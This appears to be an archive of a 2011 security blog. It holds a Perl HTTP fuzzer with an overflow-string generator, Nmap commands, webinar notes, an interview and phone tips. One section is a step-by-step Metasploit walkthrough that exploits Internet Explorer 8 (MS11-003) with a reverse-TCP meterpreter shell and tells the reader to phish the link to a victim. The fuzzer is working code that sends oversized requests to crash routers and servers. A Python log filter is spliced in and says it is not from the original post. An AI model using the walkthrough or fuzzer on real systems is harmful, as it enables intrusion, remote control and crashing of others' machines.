Thursday, 29 December 2011

HTTP Fuzzing - Perl

Here is the protocol fuzzing script, which will turn up some awesome crashes/bugs on an HTTP server.

This script is a basic version, but it is reliable. The contents of overflow.txt are up to the user.

Code Snippet

#!/usr/bin/perl
# HTTP Protocol Fuzzing (Basic)
# Find most of the bugs in Modems, Routers, minihttp servers, etc....
#
# Usage: perl httpfuzz.pl <IP> <Port>
# Example: root@n41k#perl httpfuzz.pl 192.168.1.1 80
#          root@n41k#perl httpfuzz.pl 172.16.1.1 8080
#
# Author : Srinivas Naik (0xN41K)
#
use strict;
use warnings;
use IO::Socket;

my ($target, $port) = @ARGV;
die "Usage: perl httpfuzz.pl <IP> <Port>\n" unless defined $target && defined $port;

print "\n\nHTTP Protocol Fuzzing..\n";
my $sock = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerPort => $port,
        PeerAddr => $target,
) or die "\nCan't connect to $target:$port..\n";

# http_methods.txt contains HTTP methods like GET, OPTIONS, etc., one per line
open(my $http2, "<", "http_methods.txt") or die "Can't open http_methods.txt: $!\n";
my @http_method = <$http2>;
close($http2);

# overflow.txt is the collection of incremental A's (generated by B0F.pl below)
open(my $http1, "<", "overflow.txt") or die "Can't open overflow.txt: $!\n";
my @http = <$http1>;
close($http1);

foreach my $method (@http_method) {
        chomp($method);
        foreach my $line (@http) {
                chomp($line);
                my $request = "$method $line/main.html HTTP/1.0\r\n\r\n";
                print $sock $request; # Send the HTTP data to the network
                sleep 2;
                print $request . "\n";
        }
}
# Note: one connection is reused for every request. An HTTP/1.0 server may
# close it after the first response, in which case the later writes are lost.
close $sock;
print "Done...\n";

The above fuzzer needs two input files:
1. http_methods.txt containing GET, PUT, HEAD, OPTIONS etc., each on a NEW LINE
2. overflow.txt containing incremental A's, which can be generated with B0F.pl

#!/usr/bin/perl
# Usage: root@n41k#perl B0F.pl 10000
# Writes lines of 1, 2, 3, ... <len-1> A's to overflow.txt
use strict;
use warnings;

my $len = $ARGV[0];
die "Usage: perl B0F.pl <length>\n" unless defined $len && $len =~ /^\d+$/;

my $PoC = "A";
# ">" truncates overflow.txt so a rerun does not append to an old file
open(my $file, ">", "overflow.txt") or die "\n [-] OVERFLOW Not Created !! $!\n";
for (my $i = 1; $i < $len; $i++) {
        print $file $PoC x $i;
        print $file "\n";
}
close($file) or die "\n [-] OVERFLOW Not Created !! $!\n";
print "\n [+] File successfully created!\n";
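
A defender's-side counterpart to the fuzzer, added here as an example and not part of the original post: a Python filter that flags access-log request lines shaped like the fuzzer's output (an unknown method, an oversized URI, or a long run of one repeated byte). The Common Log Format layout, the 2048-byte threshold and the sample log lines are assumptions constructed for the example.

```python
import re
# Standard HTTP methods; anything else is flagged (the fuzzer iterates over an arbitrary list).
KNOWN_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE", "CONNECT", "PATCH"}
MAX_URI_LEN = 2048  # assumed threshold; tune to what the server is known to accept

# Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" (?P<status>\d{3}|-) (\d+|-)')

def check_request_line(request, max_uri_len=MAX_URI_LEN):
    """Return the reasons a request line looks like fuzzing traffic (empty list if clean)."""
    parts = request.split(" ")
    if len(parts) != 3:
        return ["malformed request line"]
    method, uri, version = parts
    reasons = []
    if method not in KNOWN_METHODS:
        reasons.append(f"unknown method {method!r}")
    if len(uri) > max_uri_len:
        reasons.append(f"uri length {len(uri)} exceeds {max_uri_len}")
    # A long run of one repeated byte is the shape of an incremental overflow file.
    run = re.search(r"(.)\1{99,}", uri)
    if run:
        reasons.append(f"repeated byte {run.group(1)!r} x{len(run.group(0))} in uri")
    if not re.fullmatch(r"HTTP/\d\.\d", version):
        reasons.append(f"bad version {version!r}")
    return reasons

def scan_log(lines):
    """Return (host, request preview, reasons) for every suspicious CLF line."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        reasons = check_request_line(m.group("request"))
        if reasons:
            findings.append((m.group("host"), m.group("request")[:40], reasons))
    return findings

# Constructed sample log: one normal request and two that mirror the fuzzer's output.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Dec/2011:10:00:01 +0000] "GET /main.html HTTP/1.0" 200 512',
    '10.0.0.9 - - [29/Dec/2011:10:00:03 +0000] "GET ' + "A" * 3000 + '/main.html HTTP/1.0" 414 0',
    '10.0.0.9 - - [29/Dec/2011:10:00:05 +0000] "FOO /main.html HTTP/1.0" 400 0',
]

if __name__ == "__main__":
    for host, preview, reasons in scan_log(SAMPLE_LOG):
        print(f"{host}: {preview!r} -> {'; '.join(reasons)}")
```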

Monday, 12 December 2011

My Best Experiences with NMAP

 Command 1: nmap -sS -A -O -sS -sU <Target IP>
               PORT STATE SERVICE VERSION
                    21/tcp open ftp vsftpd 2.0.4
                    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
           Aggressive OS guesses
               Network Distance
               Host script results
               Traceroute
      **The above command takes a little more time :)

 Command 2: nmap -sS <Target IP> -p21,23,80,139,445 --reason
       --reason --> shows why Nmap decided on each port's state

 Command 3: nmap -p445 --script=smb-os-discovery <Target IP>

 Command 4: nmap --osscan-limit -n -vvv -PN --scan-delay 1s -A

Will discuss more in coming posts....

Thursday, 8 December 2011

Webinar: Advanced Persistent Defence

By: Marcus Carey, RAPID7
Time: 00:30 AM - 01:30 AM, Thu 08 Dec 2011

In the webinar he focused on the overall attack picture and on how APTs spread.

I summarise the points in this post:

1. Most attacks require human interaction
- Clicking BAD links / files
- USB media
Of the above, 29.80% are technical attacks;
70.80% are done by social engineering, i.e. attacking the mind of the user.

A special note was made that mass malware packs are publicly available, and 99%+ of attacks don't involve a 0day.

2. Perimeter Exploit Exposure
- MS11-083
Attackers could send UDP data through closed ports
- Network egress points
No filtering of TCP/UDP
Maintaining firewall rules
Legacy rules in place

3. Web Application Long Tail
- Problem
Many 2011 breaches used SQL injection

- Mitigation
Intense code review when changes are made
Regular assessment of deployed code

4. Social Engineering
- People open malicious links/executables
- Can lead to complete compromise of the system
- Phishing is the leading cause of compromise (70.8%)

Dead Evil Captures - Xploits PCAP

I have put all the exploits into it; it also contains the latest attacks.

I created it for testing IDPS / intrusion detection systems.

http://groups.google.com/group/nforceit/browse_thread/thread/5ca43f14cf0ffd4a

Just download the PCAP from the link.

File: exploit_attack.pcap

Thursday, 24 November 2011

Interview with Mr.C.S. Lee

Interview with Mr.C.S. Lee (Core Member – HeX LiveCD).

Naik: Can you tell us about yourself, Mr. Lee?
Lee: I'm a human from earth, not an alien. Maybe I'm an alien in the eyes of other aliens on other planets, but that doesn't count.
Most people know me as geek00l, but I'm C.S. Lee. Compared to the rest of the guys, I'm kind of late into the security field,
or to be exact, computing. I had the chance to play around with computer stuff when I was 21 years old because I was working
in a cyber cafe. I was lucky enough to stop my studies at the local university and focus on computing. I'm a self-learner and picked
up most of the stuff from the internet; back then I used astalavista, Yahoo and some other search engines a lot to look
for information and study.

Naik: Can you share your views on Security and Forensics with us?
Lee: My view on computer security is simple enough. Why do we need security (not only in computing but in general)?
Because we human beings are flawed; you can't expect imperfect human beings to create perfect things, and hence weakness is
introduced in any creation.

Lee: Forensics, on the other hand, is more like the aftermath study: you perform analysis based on what is available at a particular
time. You focus a lot on post-processing and report what you find. One thing I find interesting is that people like logic and
tend to think they are right; in forensics you can't apply your own logic to the subject you are analyzing, you should follow
your subject's logic in order to find out the real motives behind every single action.

Naik: Have you ever been a victim of a cyber attack?
Lee: Victim of a cyber attack? Indirectly, yes. I load malware into my sandbox and I'm infected ;) If you want me to give you an exact
answer, I can't really tell. Back then when I used Windows I might not even have known if I was a victim. If you are talking about
a serious victim, I haven't been one yet.

Naik: Could you briefly let us know about your projects?
Lee: I do various IT-security projects - some commercial and some open source. I'm involved in the HeX system, NSM-Console, Picviz,
a Splunk plugin and some other projects. All of them are interesting to me. Most of the projects are security related but can
be applied to other domains; for example, Picviz allows you to visualize not only IT security data but financial data as well.

Naik: Can you share your most accomplished work with us?
Lee: No idea regarding my most accomplished work. I'm involved in some other projects I'm really proud of, but NDAs don't allow me to
share about them. Anyway, I'm happy doing open source stuff.


Naik: Your secret behind actively replying to posts in various groups?
Lee: No secret ;) Subscribe to and follow mailing lists, and group them properly in your email so that you can keep them in order. On the other
hand, keep a good list of RSS feeds for IT security sites. IT security is a never-sleep industry and you need to always keep track
of the threat landscape.

Naik: Any suggestions/ideas you would like to share with newbies?
Lee: For whoever wants to enter the IT security industry, unfortunately there's no shortcut. The most important thing you need to have is
not knowledge but passion; with passion you will keep going no matter how tough it is ;)

Naik: Do's and don'ts for a successful career in Security & Forensics?
Lee: Do & don't: don't ask silly questions before you do your part (study and research on a certain subject). This industry is not for
lazy people, apparently.

Naik: Finally, what holds your attention in the cyber world?
Lee: The attention, this is an interesting question indeed. I guess it is the threat landscape; it keeps changing and evolving from time
to time as countermeasures are applied, and I need to watch them ;)

Naik: Is there anything else you would like to tell us?
Lee: That's all for now, thank you!

More about Mr. Lee:
http://groups.google.com/group/HeX-liveCD
http://www.securitydistro.com/security-articles/Interview-with-C.S.-Lee-creator-of-HeX

Tuesday, 22 November 2011

How I hacked into Windows 7 Ultimate (x86)

Initially I started scanning using Nmap, but ended up with only the basic Windows ports open: 135, 139 and 445.

Then I started to gear up with the SMB exploits available in MSF, but failed. Finally, an Internet Explorer bug got the Windows 7 machine OWNED.

I owned a LAN machine with this bug and maintained access.

Exploit Details:
Windows 7 for 32-bit Systems with Internet Explorer 8 - Remote Code Execution, Severity: Critical
Reference: http://technet.microsoft.com/en-us/security/bulletin/ms11-003

How to Exploit:
1. Launch Metasploit
2. Update it
3. Type msfconsole
4. Search for ms11_003_ie_css_import
5. Use the exploit by choosing reverse TCP as Payload.

msf > use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > show payloads
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set LHOST [MY IP ADDRESS]
msf exploit(ms11_003_ie_css_import) > exploit



6. Share or Phish the Created URL with the Victim
7. Once the Victim opens the URL on IE8, you will get Notified
8. Check sessions -l for a successful session.
9. Now, use the session with >> sessions -i 1
10. Then type shell to see the Windows prompt.


Cheers !!!!! Now you also OWN a Windows 7 machine.

*** My setup: BackTrack 5 (running Metasploit) as the attacker, and Windows 7 Ultimate Edition with the IE8 browser as the target.

Monday, 21 November 2011

Unlocking Mobile Phones


Unlock your Mobile Phone
  1. *#06# Show the IMEI number
  2. **03*OldCode*NewCode*NewCode# Change code for call barring
  3. **03*330*OldCode*NewCode*NewCode# Change code for call barring
  4. **04*OldPIN*NewPIN*NewPIN# Change PIN code
  5. **042*OldPIN2*NewPIN2*NewPIN2# Change PIN2 code
  6. **05*PUK*NewPIN*NewPIN# Unlock PIN code
  7. **052*PUK2*NewPIN2*NewPIN2# Unlock PIN2 code

Wednesday, 16 November 2011

Fake Call -- Awesome Trick



All you have to do first is get this fake call feature and set a voice; you can also use it without a voice, depending on your wish or requirement.

Go to Menu --> Setting --> Application Settings --> Fake call --> Fake call voice (or) No voice--> record a voice or something accordingly to your wish.

After this step, assign the fake call application to a shortcut:
Go to Menu --> Setting --> Phone Settings --> Shortcuts --> Select Up (or) Down --> Options --> Change --> Fake call --> Save --> Back to Home Screen

Now press the Up (or) Down key you saved in the above step and you will get an alert "Activate Fake Call".
After activation, within 7 seconds you will get a call. Answer the call and leave your desired location.

Once you get used to it, everything will be okay for you to use.

Enjoy the fake calling feature of the stylish SAMSUNG CORBY TXT!!! I have practically used this feature.